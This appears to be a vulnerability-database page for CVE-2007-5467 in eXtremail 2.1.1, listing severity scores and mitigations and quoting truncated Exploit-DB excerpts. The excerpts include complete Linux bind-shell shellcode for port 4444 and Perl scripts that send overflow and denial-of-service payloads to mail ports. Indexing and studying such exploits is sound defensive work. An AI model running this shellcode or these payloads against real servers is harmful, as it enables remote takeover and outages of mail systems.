CVE-2007-5467
Published 2007-10-15. CVE-2007-5467: Integer overflow in eXtremail 2.1.1 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long USER…
Priority P349 · critical · 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS
13.52%
96.0th percentile
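Integer overflow in eXtremail 2.1.1 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long USER command containing "%s" sequences to the pop3 port (110/tcp), which are expanded to "%%s" before being used in the memmove function, possibly due to an incomplete fix for CVE-2001-1078. No fixed version is listed for the affected range below, so the practical mitigations are to restrict network access to the service or to retire it. This description covers only the POP3 USER path; the Exploit-DB listings indexed under this CVE also contain code whose own constants point at the IMAP port (143) and an admin port (4501), so exposure of those services should be assessed separately.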
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extremail | extremail | <= 2.1.1 | — |
No detection rules found.
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
/* Seven instruction bytes stored as a string literal; the author's inline
 * comments give the x86 (AT&T syntax) disassembly of each piece. */
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
eXtremail 2.1.1 - 'memmove()' Remote Denial of Service
---
#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by
#
# eXtremail [1,50]
$max_len = int(rand(50) + 1);
# [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
$pad1_len = int(rand($max_len * 0.75));
# [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
$pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);
$pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));
$buf = "USER ".
($NOP x $pad1_len).
("%s" x $pad2_len).
($NOP x $pad3_len).
"\n";
print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
send(SOCKET, $buf, 0);
sleep($send_delay);
close(SOCKET);
}
}
# Prints a two-line banner: the product name, then the digit-labs.org URL
# followed by a blank line. Reads no arguments and returns print's result.
sub print_header {
# NOTE(review): this line ends in a space before "\n", so text after the
# product name looks lost in extraction; compare with the upstream file.
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
sub usage {
p
Exploit-DB
eXtremail 2.1.1 - Remote Heap Overflow (PoC)
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - Remote Heap Overflow (PoC)
eXtremail 2.1.1 - Remote Heap Overflow (PoC)
---
#!/usr/bin/perl
#
# extremail-v8.pl
#
# Copyright (c) 2007 by
#
# eXtremail * Connected\n");
sleep(16);
print("-> * Sending payload\n");
$buf = "\x00".($NOP x (0x2710-1));
send(SOCKET, $buf, 0);
sleep($send_delay);
$buf = $NOP x 0x2710;
while ($loop--) {
print("-> * Sending payload ".$loop."\n");
send(SOCKET, $buf, 0);
sleep($send_delay);
}
print("-> * Successfully sent payload!\n");
}
# Prints a two-line banner: the product name, then the digit-labs.org URL
# followed by a blank line. Reads no arguments and returns print's result.
sub print_header {
# NOTE(review): this line ends in a space before "\n", so text after the
# product name looks lost in extraction; compare with the upstream file.
print("eXtremail \n");
print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}
# Prints the command-line usage text, with $0 (the script name) interpolated,
# then terminates the process with exit status 1. Never returns to the caller.
sub usage {
# NOTE(review): the argument placeholder after "-t" appears to have been
# stripped by text extraction; compare with the upstream file.
print(qq(Usage: $0 -t
-t : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyna
Exploit-DB
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
/* Compile-time settings for this listing; the code that uses them is outside this excerpt. */
#define BUF_SIZE 8192
/* 0x41 is ASCII 'A'. */
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
/* NOTE(review): 4501 is neither the POP3 port (110/tcp) named in the CVE text on this page
 * nor a standard mail port; PORT_ADMIN suggests an administration service, so confirm
 * whether that port is exposed on affected hosts. */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
/* Second port number, named for a shell; its use is outside this excerpt. */
#define PORT_SHELL 4444
/* Raw byte string stored under the name bndshell_lnx; it is not decoded or used within this excerpt.
 * NOTE(review): the byte pair \x11\x5c is 4444 in network byte order, the same value as
 * PORT_SHELL, so an unexpected TCP listener on 4444 on a host running this mail service
 * is a useful indicator to alert on. */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
No writeups or analysis indexed.
http://secunia.com/advisories/27220
http://www.digit-labs.org/files/exploits/extremail-v3.pl
http://www.securityfocus.com/archive/1/482293
http://www.securityfocus.com/bid/26074
https://www.exploit-db.com/exploits/4532
2007-10-15
Published